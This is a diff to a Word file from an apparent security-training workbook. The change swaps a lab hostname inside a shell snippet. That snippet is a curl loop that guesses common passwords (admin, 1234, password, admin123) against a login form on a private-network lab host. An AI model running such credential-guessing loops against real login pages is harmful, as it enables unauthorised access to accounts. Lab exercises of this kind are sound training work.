--- a/contents/battle-workbook/compliance-w01.docx
+++ b/contents/battle-workbook/compliance-w01.docx
@@ -524,7 +524,7 @@
         </w:rPr>
         <w:t>for pw in admin 1234 password admin123; do</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  curl -s -A "co01r1-kim" -H "Host: govportal.6v6.lab" \</w:t>
+        <w:t xml:space="preserve">  curl -s -A "co01r1-kim" -H "Host: govportal.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">    --data "username=admin&amp;password=$pw&amp;Login=Login" "http://192.168.0.161/login"</w:t>
         <w:br/>
